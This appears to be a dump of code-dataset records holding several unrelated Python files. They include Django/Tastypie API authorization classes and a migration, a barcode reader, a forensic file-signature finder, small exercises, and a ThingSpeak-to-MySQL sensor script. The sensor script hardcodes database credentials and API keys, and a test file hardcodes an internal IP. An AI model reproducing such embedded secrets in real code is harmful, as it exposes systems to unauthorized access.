if user.has_perm('projects.change_project', bundle.obj):\n # the user has permission to edit\n return True\n else:\n raise Unauthorized(\n \"You don't have permission to edit this project\"\n )\n\n\nclass GenericAnnotationSetAuthorization(Authorization):\n \"\"\"\n Implements authorization for the GenericAnnotationSet.\n \"\"\"\n\n def read_list(self, object_list, bundle):\n \"\"\"Restrict the list to only user visible GenericAnnotationSet.\"\"\"\n user = get_real_user_object(bundle.request.user)\n user_objects = get_objects_for_user(user, [\n 'projects.view_genericannotationset'], object_list)\n\n return user_objects\n\n def read_detail(self, object_list, bundle):\n \"\"\"Check user has permission to view this GenericAnnotationSet.\"\"\"\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n # check the user has permission to view this object\n if user.has_perm('projects.view_genericannotationset', bundle.obj):\n return True\n\n raise Unauthorized()\n\n def create_list(self, object_list, bundle):\n raise Unauthorized(\"Sorry, no create lists.\")\n\n def create_detail(self, object_list, bundle):\n #Allow creates for Authenticated users\n if bundle.request.user.is_authenticated():\n return True\n\n raise Unauthorized(\n \"You need to log in to create annotation sets.\")\n\n def delete_list(self, object_list, bundle):\n \"\"\"Currently do not permit deletion of any GenericAnnotationSet list.\n \"\"\"\n raise Unauthorized(\n \"You do not have permission to delete these annotation sets.\")\n\n def delete_detail(self, object_list, bundle):\n \"\"\"\n Check the user has permission to delete.\n \"\"\"\n\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n # check the user has permission to delete this object\n if user.has_perm('projects.delete_genericannotationset', bundle.obj):\n return True\n\n raise Unauthorized(\n \"You do not have permission to delete this project.\")\n\n def update_detail(self, object_list, bundle):\n \"\"\"Restrict access to updating a project.\n \"\"\"\n\n user = get_real_user_object(bundle.request.user)\n if user.has_perm('projects.change_genericannotationset', bundle.obj):\n # the user has permission to edit\n return True\n else:\n raise Unauthorized(\n \"You don't have permission to edit this annotation set\"\n )\n\n\nclass GenericPointAnnotationAuthorization(Authorization):\n \"\"\"\n Implements authorization for the GenericPointAnnotations.\n \"\"\"\n\n def read_list(self, object_list, bundle):\n \"\"\"Restrict the list to only user visible GenericPointAnnotations.\"\"\"\n user = get_real_user_object(bundle.request.user)\n\n # get the objects the user has permission to see\n annotation_set_objects = get_objects_for_user(user, [\n 'projects.view_genericannotationset'])\n\n # get all annotation points for the above allowable annotation sets\n point_annotations = GenericPointAnnotation.objects.select_related(\"generic_annotation_set\")\n point_annotation_ids = (point_annotations.filter(generic_annotation_set__in=annotation_set_objects).\n values_list('id'))\n\n #now filter out the deployments we are not allowed to see\n return object_list.filter(id__in=point_annotation_ids)\n\n def read_detail(self, object_list, bundle):\n \"\"\"Check user has permission to view this GenericPointAnnotation.\"\"\"\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n # check the user has permission to view this object\n if user.has_perm('projects.view_genericannotationset', bundle.obj.generic_annotation_set):\n return True\n\n # raise hell! - https://github.com/toastdriven/django-\n # tastypie/issues/826\n raise Unauthorized()\n\n def create_list(self, object_list, bundle):\n raise Unauthorized(\"Sorry, no create lists.\")\n\n def create_detail(self, object_list, bundle):\n #authenticated people can create items\n if bundle.request.user.is_authenticated():\n return True\n\n raise Unauthorized(\n \"You don't have permission to create annotations on this annotation set.\")\n\n def delete_list(self, object_list, bundle):\n \"\"\"Currently do not permit deletion of any GenericAnnotationSet list.\n \"\"\"\n raise Unauthorized(\"You do not have permission to delete these annotation points.\")\n\n def delete_detail(self, object_list, bundle):\n \"\"\"\n Check the user has permission to delete.\n \"\"\"\n\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n #if the user is not authenticated they can't do anything\n if not bundle.request.user.is_authenticated():\n raise Unauthorized()\n\n # check the user has permission to edit the contained annotation set\n if user.has_perm('projects.change_genericannotationset', bundle.obj.generic_annotation_set):\n return True\n\n raise Unauthorized(\n \"You do not have permission to delete this annotation point.\")\n\n def update_detail(self, object_list, bundle):\n \"\"\"Restrict access to updating a project.\n \"\"\"\n\n user = get_real_user_object(bundle.request.user)\n\n #if the user is not authenticated they can't do anything\n if not bundle.request.user.is_authenticated():\n raise Unauthorized()\n\n # check the user has permission to edit the contained annotation set\n if user.has_perm('projects.change_genericannotationset', bundle.obj.generic_annotation_set):\n return True\n\n raise Unauthorized(\"You don't have permission to edit this annotation point.\")\n\n\nclass ProjectResource(BackboneCompatibleResource):\n owner = fields.ForeignKey(UserResource, 'owner', full=True)\n generic_images = fields.ManyToManyField(GenericImageResource, 'generic_images', full=True)\n\n class Meta:\n queryset = Project.objects.all()\n resource_name = \"project\"\n authentication = MultiAuthentication(AnonymousGetAuthentication(),\n ApiKeyAuthentication(),\n Authentication())\n authorization = ProjectAuthorization()\n detail_allowed_methods = ['get', 'post', 'put', 'delete']\n list_allowed_methods = ['get', 'post', 'put', 'delete']\n filtering = {\n 'name': ALL,\n 'owner': ALL,\n 'generic_images': ALL_WITH_RELATIONS,\n 'id': 'exact'\n }\n #excludes = ['owner', 'creation_date', 'modified_date']\n\n def obj_create(self, bundle, **kwargs):\n \"\"\"\n We are overiding this function so we can get access to the newly\n created Project. Once we have reference to it, we can apply\n object level permissions to the object.\n \"\"\"\n\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n #put the created and modified dates on the object\n create_modified_date = datetime.now()\n bundle.data['creation_date'] = create_modified_date\n bundle.data['modified_date'] = create_modified_date\n\n #attach current user as the owner\n bundle.data['owner'] = user\n\n #create the bundle\n super(ProjectResource, self).obj_create(bundle)\n\n #make sure we apply permissions to this newly created object\n authorization.apply_project_permissions(user, bundle.obj)\n\n return bundle\n\n def dehydrate(self, bundle):\n # Add an image_count field to ProjectResource.\n bundle.data['image_count'] = Project.objects.get(pk=bundle.data[\n 'id']).generic_images.count()\n\n # Add the map_extent of all the images in this project\n images = Project.objects.get(id=bundle.obj.id).generic_images.all()\n images = GenericImage.objects.filter(id__in=images)\n map_extent = \"\"\n if len(images) != 0:\n map_extent = images.extent().__str__()\n\n bundle.data['map_extent'] = map_extent\n\n return bundle\n\n\nclass GenericAnnotationSetResource(BackboneCompatibleResource):\n project = fields.ForeignKey(ProjectResource, 'project', full=True)\n generic_images = fields.ManyToManyField(GenericImageResource, 'generic_images', full=True, blank=True, null=True)\n\n class Meta:\n queryset = GenericAnnotationSet.objects.all()\n resource_name = \"generic_annotation_set\"\n authentication = MultiAuthentication(AnonymousGetAuthentication(),\n ApiKeyAuthentication(),\n Authentication())\n authorization = GenericAnnotationSetAuthorization()\n detail_allowed_methods = ['get', 'post', 'put', 'delete']\n list_allowed_methods = ['get', 'post', 'put', 'delete']\n filtering = {\n 'project': 'exact',\n 'name': 'exact',\n 'owner': 'exact',\n 'id': 'exact'\n }\n\n def random_sample_images(self, project, sample_size):\n \"\"\" Randomly sample images from the parent project and\n attach them to this annotation set. \"\"\"\n\n project_images = project.generic_images.all()\n sampled_images = sample(project_images, int(sample_size))\n\n return sampled_images\n\n def stratified_sample_images(self, project, sample_size):\n \"\"\" Stratified sample images from the parent project and\n attach them to this resource. \"\"\"\n\n project_images = project.generic_images.all()\n every_nth = project_images.count()/int(sample_size)\n\n sampled_images = project_images[0:project_images.count():every_nth]\n\n return sampled_images\n\n def apply_random_sampled_points(self, annotation_set, sample_size):\n \"\"\" Randomly apply points to the images attached to this annotation\n set \"\"\"\n\n images = annotation_set.generic_images.all()\n\n # iterate through the images and create points\n for image in images:\n for i in range(int(sample_size)):\n x = random.random()\n y = random.random()\n\n point_annotation = GenericPointAnnotation()\n\n point_annotation.generic_annotation_set = annotation_set\n point_annotation.image = image\n point_annotation.owner = annotation_set.owner\n point_annotation.x = x\n point_annotation.y = y\n\n point_annotation.annotation_caab_code = \"00000000\" # not considered\n point_annotation.qualifier_short_name = \"\" # not considered\n\n point_annotation.save()\n\n def apply_stratified_sampled_points(self, annotation_set, sample_size):\n \"\"\" Apply points to the images attached to this annotation set using\n stratified sampling \"\"\"\n\n #TODO: implement\n return None\n\n def do_sampling_operations(self, bundle):\n \"\"\" Helper function to hold all the sampling logic \"\"\"\n\n # subsample and set the images\n image_sample_size = bundle.data['image_sample_size']\n image_sampling_methodology = bundle.data['image_sampling_methodology']\n\n if image_sampling_methodology == '0':\n bundle.obj.generic_images = self.random_sample_images(bundle.obj.project, image_sample_size)\n elif image_sampling_methodology == '1':\n bundle.obj.generic_images = self.stratified_sample_images(bundle.obj.project, image_sample_size)\n else:\n raise Exception(\"Image sampling method not implemented.\")\n\n #save the object with the new images on it\n bundle.obj.save()\n\n # subsample points based on methodologies\n point_sample_size = bundle.data['point_sample_size']\n annotation_methodology = bundle.data['annotation_methodology']\n\n if annotation_methodology == '0':\n self.apply_random_sampled_points(bundle.obj, point_sample_size)\n else:\n raise Exception(\"Point sampling method not implemented.\")\n\n def obj_create(self, bundle, **kwargs):\n \"\"\"\n We are overiding this function so we can get access to the newly\n created GenericAnnotationSet. Once we have reference to it, we can apply\n object level permissions to the object.\n \"\"\"\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n #create the bundle\n super(GenericAnnotationSetResource, self).obj_create(bundle)\n\n #generate image subsamples and points\n try:\n self.do_sampling_operations(bundle)\n except Exception:\n #delete the object that was created\n bundle.obj.delete()\n\n #return not implemented response\n raise ImmediateHttpResponse(HttpNotImplemented(\"Unable to create annotation set.\"))\n\n #make sure we apply permissions to this newly created object\n authorization.apply_generic_annotation_set_permissions(user, bundle.obj)\n\n return bundle\n\n\nclass GenericPointAnnotationResource(BackboneCompatibleResource):\n generic_annotation_set = fields.ForeignKey(GenericAnnotationSetResource, 'generic_annotation_set', full=True)\n image = fields.ForeignKey(GenericImageResource, 'image', full=True)\n\n class Meta:\n queryset = GenericPointAnnotation.objects.all()\n resource_name = \"generic_point_annotation\"\n authentication = MultiAuthentication(AnonymousGetAuthentication(),\n ApiKeyAuthentication(),\n Authentication())\n authorization = GenericPointAnnotationAuthorization()\n detail_allowed_methods = ['get', 'post', 'put', 'delete']\n list_allowed_methods = ['get', 'post', 'put', 'delete']\n filtering = {\n 'image': 'exact',\n 'owner': 'exact',\n 'id': 'exact',\n 'annotation_caab_code': 'exact',\n 'qualifier_short_name': 'exact',\n 'generic_annotation_set': 'exact',\n }\n\n def obj_create(self, bundle, **kwargs):\n \"\"\"\n We are overiding this function so we can get access to the newly\n created GenericAnnotationSet. Once we have reference to it, we can apply\n object level permissions to the object.\n \"\"\"\n\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n super(GenericPointAnnotationResource, self).obj_create(bundle)\n\n # NOTE: we can't check permissions on related objects until the bundle\n # is created - django throws an exception. What we need to do here is\n # check permissions. If the user does not have permissions we delete\n # the create object.\n if not user.has_perm('projects.change_genericannotationset', bundle.obj.generic_annotation_set):\n bundle.obj.delete()\n\n return bundle\n\n\nclass GenericWholeImageAnnotationResource(BackboneCompatibleResource):\n generic_annotation_set = fields.ForeignKey(GenericAnnotationSet, 'generic_annotation_set', full=True)\n image = fields.ForeignKey(GenericImageResource, 'image', full=True)\n\n class Meta:\n queryset = GenericWholeImageAnnotation.objects.all()\n resource_name = \"generic_whole_image_annotation\"\n authentication = MultiAuthentication(AnonymousGetAuthentication(),\n ApiKeyAuthentication(),\n Authentication())\n authorization = ProjectAuthorization()\n detail_allowed_methods = ['get', 'post', 'put', 'delete']\n list_allowed_methods = ['get', 'post', 'put', 'delete']\n filtering = {\n 'image': 'exact',\n 'owner': 'exact',\n 'id': 'exact',\n 'annotation_caab_code': 'exact',\n 'qualifier_short_name': 'exact',\n 'generic_annotation_set': 'exact',\n }\n\n\nclass AnnotationCodesResource(BackboneCompatibleResource):\n parent = fields.ForeignKey('projects.api.AnnotationCodesResource', 'parent', null=True)\n\n class Meta:\n queryset = AnnotationCodes.objects.all()\n resource_name = \"annotation_code\"\n authentication = MultiAuthentication(AnonymousGetAuthentication(),\n ApiKeyAuthentication(),\n Authentication())\n #authorization = ProjectAuthorization()\n detail_allowed_methods = ['get']\n list_allowed_methods = ['get']\n\n filtering = {\n 'parent': ALL_WITH_RELATIONS,\n 'code_name': ALL,\n 'id': ALL,\n }\n\n\nclass QualifierCodesResource(BackboneCompatibleResource):\n parent = fields.ForeignKey('projects.api.QualifierCodesResource', 'parent', full=True)\n\n class Meta:\n queryset = QualifierCodes.objects.all()\n resource_name = \"qualifier_code\"\n authentication = MultiAuthentication(AnonymousGetAuthentication(),\n ApiKeyAuthentication(),\n Authentication())\n #authorization = ProjectAuthorization()\n detail_allowed_methods = ['get']\n list_allowed_methods = ['get']\n filtering = {\n 'short_name': 'exact',\n 'id': 'exact',\n 'parent': 'exact',\n }","sub_path":"projects/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":21947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"154147808","text":"\"\"\"\nhttps://edabit.com/challenge/Aw2QK8vHY7Xk8Keto\n\nLongest Word\nWrite a function that finds the longest word in a sentence. If two or more words are found, return the first longest word. Characters such as apostophe, comma, period (and the like) count as part of the word (e.g. O'Connor is 8 characters long).\n\nExamples\nlongest_word(\"Margaret's toy is a pretty doll.\") ➞ \"Margaret's\"\n\nlongest_word(\"A thing of beauty is a joy forever.\") ➞ \"forever.\"\n \nlongest_word(\"Forgetfulness is by all means powerless!\") ➞ \"Forgetfulness\"\nNotes\nA similar version of this challenge, which is to be implemented recursively, can be found in here.\n\"\"\"\n\ndef longest_word(sentence):\n longest = \"\"\n\n for word in sentence.split(\" \"):\n if len(word) > len(longest):\n longest = word\n \n return longest\n\n","sub_path":"edabit/longest_word.py","file_name":"longest_word.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"135915782","text":"import pyzbar.pyzbar as pyzbar\nimport cv2\n\n\nclass Baread:\n def baread(self):\n self.cap = cv2.VideoCapture(0)\n self.bar = None\n self.i = 0\n\n while(self.cap.isOpened()):\n self.ret, self.img = self.cap.read()\n self.img = cv2.resize(self.img, dsize=(780,820),interpolation = cv2.INTER_LINEAR)\n cv2.moveWindow('img', 20, 130)\n\n self.gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)\n \n self.decoded = pyzbar.decode(self.gray)\n\n for d in self.decoded: \n x, y, w, h = d.rect\n\n d_bar = d.data.decode(\"utf-8\")\n self.bar = d_bar\n\n barcode_type = d.type\n\n cv2.rectangle(self.img, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n self.text = '%s (%s)' % (self.bar , barcode_type)\n cv2.putText(self.img, self.text, (x, y), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2, cv2.LINE_AA)\n print(self.bar)\n return self.bar\n\n cv2.imshow('img', self.img)\n\n self.key = cv2.waitKey(1)\n if self.key == ord('q'):\n break\n elif self.key == ord('s'):\n self.i += 1\n cv2.imwrite('c_%03d.jpg' % self.i, self.img) \n \n\n \n\n self.cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n import sys\n barcode = Baread()\n barcode.baread()\n","sub_path":"UI_Test/barcode.py","file_name":"barcode.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"35341493","text":"#Python version 3.4.3\r\n#By: Groep 4 - Rick van Gorp, Nursize Bilen, Joeri van Grimbergen\r\n\r\nimport re\r\nimport binascii\r\nimport os\r\nimport sys\r\n\r\nwith open(\"ALLheaders.txt\", \"r\") as f:\r\n arrHeaders = f.read().splitlines()\r\n \r\nfor i in range(0,len(arrHeaders)):\r\n arrHeaders[i] = binascii.unhexlify(arrHeaders[i])\r\n\r\nprint(\"Database with known Magic Values loaded:\\n\" + str(arrHeaders))\r\n\r\narrFiles = []\r\n\r\nif len(sys.argv) > 1:\r\n for i in range(1,len(sys.argv)):\r\n arrFiles.append(str(sys.argv[i]))\r\nelse:\r\n arrFiles.append(str(input(\"\\nPlease input a valid filename:\\n\")))\r\n\r\n\r\nfor i in range(0,len(arrFiles)):\r\n with open(arrFiles[i], \"rb\") as file:\r\n intLen = 0\r\n arrOutPutData = []\r\n while intLen < os.path.getsize(arrFiles[i]):\r\n content = file.read(16384) #Block = 16384 bytes\r\n intLen = intLen + 16384\r\n for k in range(0,len(arrHeaders)):\r\n for m in re.finditer(re.compile(re.escape(arrHeaders[k])), content):\r\n arrOutPutData.append([hex(m.start()+intLen-16384),arrHeaders[k]])\r\n print(\"\\n\" + hex(m.start()+intLen-16384))\r\n print(arrHeaders[k])\r\n file.close()\r\n strOutputFile = \"Results - \" + arrFiles[i] + \".txt\"\r\n with open(strOutputFile, \"w\") as fOutPut:\r\n fOutPut.write(\"Value\\tLocation\\n\")\r\n for j in range(0,len(arrOutPutData)):\r\n fOutPut.write(str(arrOutPutData[j][1]) + \"\\t\" + str(arrOutPutData[j][0]) + \"\\n\")\r\n \r\n","sub_path":"exercises/week6/Groep-4/scripts/HeaderFinder.py","file_name":"HeaderFinder.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"1627752","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Brigade',\n fields=[\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('id', models.CharField(max_length=255, serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=255)),\n ('city', models.CharField(max_length=255)),\n ('latitude', models.FloatField(null=True, blank=True)),\n ('longitude', models.FloatField(null=True, blank=True)),\n ('started_on', models.DateField(null=True, blank=True)),\n ('website', models.URLField(max_length=1000)),\n ('type', models.CharField(max_length=255)),\n ('events_url', models.URLField(max_length=1000)),\n ('rss', models.URLField(max_length=1000)),\n ],\n options={\n 'db_table': 'brigade',\n },\n ),\n migrations.CreateModel(\n name='GitHubRepository',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('name', models.CharField(max_length=255)),\n ('description', models.TextField(null=True, blank=True)),\n ('language', models.CharField(max_length=255, null=True, blank=True)),\n ('homepage', models.URLField(max_length=1000, null=True, blank=True)),\n ('stargazers_count', models.IntegerField()),\n ('watchers_count', models.IntegerField()),\n ('forks_count', models.IntegerField()),\n ('open_issues', models.IntegerField()),\n ('created_at', models.DateTimeField()),\n ],\n options={\n 'db_table': 'github_repository',\n },\n ),\n migrations.CreateModel(\n name='GitHubRepositoryContributor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('contributions', models.PositiveIntegerField()),\n ],\n options={\n 'db_table': 'github_repo_contributors',\n },\n ),\n migrations.CreateModel(\n name='GitHubUser',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('name', models.CharField(max_length=255)),\n ('avatar_url', models.CharField(max_length=255, null=True, blank=True)),\n ],\n options={\n 'db_table': 'github_user',\n },\n ),\n migrations.CreateModel(\n name='MeetupEvent',\n fields=[\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('id', models.CharField(max_length=255, serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=255)),\n ('description', models.TextField(null=True, blank=True)),\n ('venue_name', models.CharField(max_length=255, null=True, blank=True)),\n ('group_name', models.CharField(max_length=255)),\n ('event_url', models.URLField(max_length=1000)),\n ('start_time', models.DateTimeField()),\n ('end_time', models.DateTimeField(null=True, blank=True)),\n ('yes_rsvp_count', models.PositiveIntegerField(default=0)),\n ('maybe_rsvp_count', models.PositiveIntegerField(default=0)),\n ('waitlist_count', models.PositiveIntegerField(default=0)),\n ('headcount', models.PositiveIntegerField(default=0)),\n ('created_at', models.DateTimeField()),\n ('brigade', models.ForeignKey(to='api.Brigade')),\n ],\n options={\n 'db_table': 'meetup_event',\n },\n ),\n migrations.CreateModel(\n name='MeetupGroup',\n fields=[\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('id', models.CharField(max_length=255, serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=255)),\n ('description', models.TextField(null=True, blank=True)),\n ('organizer_name', models.CharField(max_length=255)),\n ('topics', models.TextField(null=True, blank=True)),\n ('rating', models.FloatField(null=True, blank=True)),\n ('members', models.PositiveIntegerField()),\n ('brigade', models.ForeignKey(to='api.Brigade')),\n ],\n options={\n 'db_table': 'meetup_group',\n },\n ),\n migrations.CreateModel(\n name='Project',\n fields=[\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('id', models.PositiveIntegerField(serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=255)),\n ('description', models.TextField(null=True, blank=True)),\n ('link_url', models.URLField(max_length=1000, null=True, blank=True)),\n ('code_url', models.URLField(max_length=1000, null=True, blank=True)),\n ('status', models.CharField(max_length=255, null=True, blank=True)),\n ('tags', models.TextField(null=True, blank=True)),\n ('organization_name', models.CharField(max_length=255)),\n ('last_updated', models.DateTimeField(null=True, blank=True)),\n ('brigade', models.ForeignKey(to='api.Brigade')),\n ('github_repository', models.ForeignKey(blank=True, to='api.GitHubRepository', null=True)),\n ],\n options={\n 'db_table': 'project',\n },\n ),\n migrations.AddField(\n model_name='githubrepositorycontributor',\n name='contributor',\n field=models.ForeignKey(to='api.GitHubUser'),\n ),\n migrations.AddField(\n model_name='githubrepositorycontributor',\n name='repository',\n field=models.ForeignKey(to='api.GitHubRepository'),\n ),\n migrations.AddField(\n model_name='githubrepository',\n name='contributors',\n field=models.ManyToManyField(to='api.GitHubUser', through='api.GitHubRepositoryContributor'),\n ),\n migrations.AddField(\n model_name='githubrepository',\n name='owner',\n field=models.ForeignKey(related_name='my_repos', to='api.GitHubUser'),\n ),\n ]\n","sub_path":"api/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":7616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"132042779","text":"import random\ncounter=0\nwhile True:\n input(\"Hit enter to roll the dice \")\n a=random.randint(1,6)\n if(a==6):\n print('you hit six')\n counter=counter+1\n print('You have hit a six in your',counter,'attempt.')\n break\n elif(a!=6):\n print('Hard luck, no six. You got',a,'.',end=\" \")\n yesorno=input('Do you want to continue yes/no?: ')\n if(yesorno.lower()=='yes'):\n counter=counter+1\n continue\n print('You have hit a six in your',counter,'attempt.')\n elif(yesorno.lower()=='no'):\n exit()\n else:\n print('Wrong input')\n exit()\n","sub_path":"rolling_the_dice.py","file_name":"rolling_the_dice.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"5171731","text":"from pymongo import MongoClient\r\n\r\nMONGO_ADDRESS = '192.168.1.231'\r\nMONGO_PORT = 27017\r\n\r\n\r\nclass Database(object):\r\n def __init__(self, address=MONGO_ADDRESS, port=MONGO_PORT):\r\n self.conn = MongoClient(host=address, port=port, serverSelectionTimeoutMS=3000000)\r\n self.db = self.conn[\"lingying-db\"]\r\n res = self.db[\"pdl-coll\"].find({'email':'jack@eckhausfleet.com'})\r\n print(list(res))\r\nd = Database()\r\n# # l = ['a','b']\r\n# # for index in range(len(l)):\r\n# # print ('当前水果 :', l[index])\r\n#\r\n# res = [\r\n# {\r\n# \"_id\": \"5\",\r\n# \"email\": \"x@.com\",\r\n# \"tel\": \"\",\r\n# \"db_type\": \"mongo\",\r\n# \"name\": \"tom mahoney\"\r\n# },\r\n# {\r\n# \"_id\": \"6\",\r\n# \"email\": \"x@.com\",\r\n# \"company_name\": \"james c. gallo\",\r\n# \"title\": \"Manager\",\r\n# \"tel\":\"\"\r\n# },\r\n# {\r\n# \"_id\": \"1\",\r\n# \"email\": \"hoo.com\",\r\n# \"company_name\": \"Ymca\",\r\n# \"fax\": 8168108899,\r\n# \"tel\": \"\",\r\n#\r\n# },\r\n# {\r\n# \"_id\": \"2\",\r\n# \"email\": \"hoo.com\",\r\n# \"city\": \"kansas city\",\r\n# \"state\": \"mo\",\r\n# \"tel\": \"\",\r\n# },\r\n# {\r\n# \"_id\": \"6\",\r\n# \"email\": \"x@.com\",\r\n# \"company_name\": \"james c. gallo\",\r\n# \"title\": \"Manager\",\r\n# \"tel\": \"fs\"\r\n# },\r\n# ]\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# def concat(a, b):\r\n# _res = []\r\n# if isinstance(a, list):\r\n# _res.extend(a)\r\n# else:\r\n# _res.append(a)\r\n# if isinstance(b, list):\r\n# _res.extend(b)\r\n# else:\r\n# _res.append(b)\r\n# _res = set(_res)\r\n# _res = list(_res)\r\n# return _res\r\n#\r\n#\r\n# def merge_data(dict1, dict2):\r\n# print(\"我要合并\",dict1,dict2)\r\n# merge_one = {}\r\n# for k1, v1 in dict1.items():\r\n# for k2, v2 in dict2.items():\r\n# if k1 == k2:\r\n# merge_one[k1] = concat(v1, v2)\r\n# if k1 not in dict2:\r\n# merge_one[k1] = v1\r\n# for k2, v2 in dict2.items():\r\n# if k2 not in dict1.keys():\r\n# merge_one[k2] = v2\r\n# print(\"合并后\",merge_one)\r\n# return merge_one\r\n#\r\n#\r\n# def merge_all(li, res):\r\n# merge_dict = {}\r\n# print(\"li\",li)\r\n# for i in li:\r\n# print(\"i\",i)\r\n# merge_dict = merge_data(merge_dict, res[i])\r\n#\r\n# return merge_dict\r\n# def array_dels(n_d_li,li):\r\n# a_index = [i for i in range(len(li))]\r\n# a_index = set(a_index)\r\n# b_index = set(n_d_li)\r\n# index = list(a_index - b_index)\r\n# _res = [li[i] for i in index]\r\n# return _res\r\n# def clean_data(res):\r\n#\r\n# e_list = []\r\n# t_list = []\r\n#\r\n# for index in range(len(res)):\r\n# one = res[index]\r\n# email = one.get(\"email\")\r\n# # 如果一条数据有email属性\r\n# if email:\r\n# flag = False\r\n# for i in range(len(e_list)):\r\n# # 有就加入所在序号,没有重新添加\r\n# if email == e_list[i][\"value\"]:\r\n# e_list[i][\"position\"].append(index)\r\n# flag = True\r\n# if not flag:\r\n# e_list.append({\"position\": [index, ], \"value\": email})\r\n# print(e_list)\r\n#\r\n# mer_list = []\r\n# need_del = []\r\n# for need_mer in e_list:\r\n# mer_dic = merge_all(need_mer[\"position\"],res)\r\n# mer_list.append(mer_dic)\r\n# need_del.extend(need_mer[\"position\"])\r\n#\r\n# res = array_dels(need_del,res)\r\n#\r\n# res.extend(mer_list)\r\n# return res\r\n#\r\n# dic = [\r\n# {\r\n#\r\n# },\r\n# {\"a\": 1,\r\n# \"b\": 2,\r\n# \"c\": 5\r\n# },\r\n# {\"a\": 1,\r\n# \"b\": 3,\r\n# \"d\": 89\r\n# },\r\n# {\"a\": 1,\r\n# \"b\": 3,\r\n# \"d\": \"fsfs\"\r\n# }\r\n# ]\r\n# # print(merge_all([0, 1, 3], dic))\r\n# # print(\"ds\", merge_data(dic[0], dic[1]))\r\n# print(clean_data(res))\r\n","sub_path":"api/test/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"202656537","text":"#!/usr/bin/python3\nimport mysql.connector, urllib.request, json, time, datetime\n\n\"\"\"\n String za spajanje na MySQL bazu podataka.\n\"\"\"\ntry:\n conn = mysql.connector.connect(\n host='portmap.io',\n port='61974',\n database='smartcity',\n user='test',\n password='123');\n print(\"Povezivanje na bazu podataka uspjesno.\\n\")\nexcept EnvironmentError as e:\n print(\"Povezivanje neuspjelo. Provjerite podatke.\\n\")\n\n \n\"\"\"\n Povlacenje JSON-a sa ThingSpeak servera.\n urllib.request.urlopen salje http request stranici, i zatim json.loads pretvara json u python objekte.\n\"\"\"\n\ncursor = conn.cursor()\n\nwith urllib.request.urlopen(\"https://api.thingspeak.com/channels/196696.json?api_key=E5V4C2KMUN5S4BWM\") as url:\n channelData = json.loads(url.read().decode())\n\njsonLastID = channelData['last_entry_id']\n\nwith urllib.request.urlopen(\"https://api.thingspeak.com/channels/196696/feeds.json?results=\" + str(jsonLastID) + \"api_key=E5V4C2KMUN5S4BWM\") as url:\n data = json.loads(url.read().decode())\n\n\"\"\"\n Ispred metode Entry su definirane liste za inicijalni unos podataka.\n Metoda Entry izvrsava inicijalni unos podataka u bazu.\n Upisuje SVE podatke sa JSONa u bazu.\n for u pythonu funkcionira kao foreach u C# sto znaci:\n npr. Svaki entry_id koji se nalazi u dijelu json-a pod ['feeds'] se stavlja u listu listEntryID .\n\"\"\"\n \nlistEntryID = []\nlistID = []\nlistTemperaturaZraka = []\nlistVlagaZraka = []\nlistKvalitetaZraka = []\nlistRazinaCO2 = []\nlistRazinaCO = []\nlistDetekcijaOpasnihPlinova = []\nlistCreatedAt = []\n\ndef Entry():\n for entryID in data['feeds']:\n listEntryID.append(entryID['entry_id'])\n\n for ID in data['feeds']:\n listID.append(ID['field1'])\n\n for TemperaturaZraka in data['feeds']:\n listTemperaturaZraka.append(TemperaturaZraka['field2'])\n\n for VlagaZraka in data['feeds']:\n listVlagaZraka.append(VlagaZraka['field3'])\n\n for KvalitetaZraka in data['feeds']:\n listKvalitetaZraka.append(KvalitetaZraka['field4'])\n\n for RazinaCO2 